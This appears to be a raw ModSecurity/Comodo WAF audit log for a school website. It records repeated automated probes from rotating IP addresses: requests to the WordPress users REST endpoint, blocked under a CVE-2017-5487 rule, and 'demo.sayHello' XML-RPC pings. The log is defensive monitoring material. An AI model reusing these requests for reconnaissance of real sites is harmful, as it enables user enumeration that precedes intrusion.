Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6337e421-Z-- --9dd4c077-A-- [17/May/2025:03:18:40 +0700] aCedoMe47ocjCGWTS4Y_SgAAAE0 103.236.140.4 54900 103.236.140.4 8181 --9dd4c077-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.164.238 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.164.238 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9dd4c077-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9dd4c077-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747426720446114 2534 (- - -) Stopwatch2: 1747426720446114 2534; combined=1086, p1=380, p2=681, p3=0, p4=0, p5=25, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9dd4c077-Z-- --0f6b503b-A-- [17/May/2025:03:18:44 +0700] aCedpNe6THFz1hsaJaLZVQAAAAI 103.236.140.4 54904 103.236.140.4 8181 --0f6b503b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.162.28 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.162.28 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0f6b503b-C-- demo.sayHello --0f6b503b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0f6b503b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747426724210589 5625 (- - -) Stopwatch2: 1747426724210589 5625; combined=4195, p1=596, p2=3338, p3=28, p4=33, p5=114, sr=118, sw=86, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0f6b503b-Z-- --414e7b3d-A-- [17/May/2025:03:18:49 +0700] aCedqce47ocjCGWTS4Y_TAAAAEY 103.236.140.4 54910 103.236.140.4 8181 --414e7b3d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.164.238 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.164.238 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --414e7b3d-C-- demo.sayHello --414e7b3d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --414e7b3d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747426729598067 5425 (- - -) Stopwatch2: 1747426729598067 5425; combined=4027, p1=538, p2=3271, p3=30, p4=33, p5=92, sr=77, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --414e7b3d-Z-- --ae543d3f-A-- [17/May/2025:03:20:23 +0700] aCeeB9e6THFz1hsaJaLZWAAAAAc 103.236.140.4 54924 103.236.140.4 8181 --ae543d3f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.62.242 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.62.242 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ae543d3f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ae543d3f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747426823592616 3223 (- - -) Stopwatch2: 1747426823592616 3223; combined=1375, p1=482, p2=861, p3=0, p4=0, p5=32, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ae543d3f-Z-- --4c08ec67-A-- [17/May/2025:03:20:31 +0700] aCeeD0E0LfP59mkCzg42GgAAAMY 103.236.140.4 54928 103.236.140.4 8181 --4c08ec67-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.62.242 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.62.242 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4c08ec67-C-- demo.sayHello --4c08ec67-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4c08ec67-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747426831621615 6594 (- - -) Stopwatch2: 1747426831621615 6594; combined=4647, p1=604, p2=3799, p3=36, p4=41, p5=99, sr=79, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4c08ec67-Z-- --3d5dfb32-A-- [17/May/2025:03:21:03 +0700] aCeeL9hEtho3ciA0wehehQAAAIc 103.236.140.4 54932 103.236.140.4 8181 --3d5dfb32-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.179.2 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.179.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3d5dfb32-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3d5dfb32-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747426863901174 2856 (- - -) Stopwatch2: 1747426863901174 2856; combined=1287, p1=437, p2=819, p3=0, p4=0, p5=31, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3d5dfb32-Z-- --609afd36-A-- [17/May/2025:03:21:07 +0700] aCeeM9hEtho3ciA0wehehgAAAI4 103.236.140.4 54936 103.236.140.4 8181 --609afd36-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.179.2 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.179.2 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --609afd36-C-- demo.sayHello --609afd36-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --609afd36-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747426867388828 4726 (- - -) Stopwatch2: 1747426867388828 4726; combined=3709, p1=465, p2=3030, p3=22, p4=24, p5=97, sr=69, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --609afd36-Z-- --2ef20e06-A-- [17/May/2025:03:23:36 +0700] aCeeyEE0LfP59mkCzg42HQAAANA 103.236.140.4 54946 103.236.140.4 8181 --2ef20e06-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.116.248 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.116.248 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2ef20e06-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2ef20e06-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747427016837892 3434 (- - -) Stopwatch2: 1747427016837892 3434; combined=1471, p1=509, p2=931, p3=0, p4=0, p5=31, sr=100, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2ef20e06-Z-- --efb9b77a-A-- [17/May/2025:03:23:44 +0700] aCee0Ne6THFz1hsaJaLZWgAAABQ 103.236.140.4 54950 103.236.140.4 8181 --efb9b77a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.116.248 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.116.248 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --efb9b77a-C-- demo.sayHello --efb9b77a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --efb9b77a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747427024804676 5186 (- - -) Stopwatch2: 1747427024804676 5186; combined=3899, p1=513, p2=3172, p3=29, p4=32, p5=91, sr=71, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --efb9b77a-Z-- --4be82d79-A-- [17/May/2025:03:24:04 +0700] aCee5Me47ocjCGWTS4Y_TgAAAE8 103.236.140.4 54954 103.236.140.4 8181 --4be82d79-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.171.44 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.171.44 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4be82d79-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4be82d79-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747427044678000 2858 (- - -) Stopwatch2: 1747427044678000 2858; combined=1329, p1=440, p2=859, p3=0, p4=0, p5=30, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4be82d79-Z-- --3cfa5628-A-- [17/May/2025:03:24:09 +0700] aCee6dhEtho3ciA0weheigAAAIw 103.236.140.4 54958 103.236.140.4 8181 --3cfa5628-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.171.44 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.171.44 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3cfa5628-C-- demo.sayHello --3cfa5628-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3cfa5628-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747427049811293 5322 (- - -) Stopwatch2: 1747427049811293 5322; combined=3969, p1=503, p2=3251, p3=28, p4=32, p5=92, sr=74, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3cfa5628-Z-- --0ee22159-A-- [17/May/2025:03:24:34 +0700] aCefAkE0LfP59mkCzg42HwAAAM4 103.236.140.4 54966 103.236.140.4 8181 --0ee22159-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.240.99.248 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.240.99.248 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0ee22159-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0ee22159-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747427074739826 2991 (- - -) Stopwatch2: 1747427074739826 2991; combined=1434, p1=484, p2=913, p3=0, p4=0, p5=37, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0ee22159-Z-- --a08f252c-A-- [17/May/2025:03:24:38 +0700] aCefBthEtho3ciA0wehejwAAAJY 103.236.140.4 54972 103.236.140.4 8181 --a08f252c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.240.99.248 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.240.99.248 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a08f252c-C-- demo.sayHello --a08f252c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a08f252c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747427078934674 4971 (- - -) Stopwatch2: 1747427078934674 4971; combined=3834, p1=437, p2=3133, p3=22, p4=25, p5=150, sr=65, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a08f252c-Z-- --09897b02-A-- [17/May/2025:03:28:58 +0700] aCegCkE0LfP59mkCzg42LQAAAMc 103.236.140.4 55060 103.236.140.4 8181 --09897b02-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.185.217 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.185.217 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --09897b02-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --09897b02-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747427338198273 3582 (- - -) Stopwatch2: 1747427338198273 3582; combined=1561, p1=556, p2=968, p3=0, p4=0, p5=37, sr=150, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --09897b02-Z-- --a8c1644d-A-- [17/May/2025:03:29:04 +0700] aCegENe6THFz1hsaJaLZYQAAAAs 103.236.140.4 55068 103.236.140.4 8181 --a8c1644d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.185.217 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.185.217 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a8c1644d-C-- demo.sayHello --a8c1644d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a8c1644d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747427344327552 5548 (- - -) Stopwatch2: 1747427344327552 5548; combined=4224, p1=557, p2=3453, p3=30, p4=34, p5=89, sr=71, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a8c1644d-Z-- --9053bf6c-A-- [17/May/2025:03:29:52 +0700] aCegQMe47ocjCGWTS4Y_XwAAAFY 103.236.140.4 55116 103.236.140.4 8181 --9053bf6c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.86.111 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.86.111 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9053bf6c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9053bf6c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747427392055088 2782 (- - -) Stopwatch2: 1747427392055088 2782; combined=1390, p1=509, p2=846, p3=0, p4=0, p5=34, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9053bf6c-Z-- --43204047-A-- [17/May/2025:03:29:56 +0700] aCegREE0LfP59mkCzg42NgAAANA 103.236.140.4 55126 103.236.140.4 8181 --43204047-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.86.111 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.86.111 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --43204047-C-- demo.sayHello --43204047-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --43204047-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s 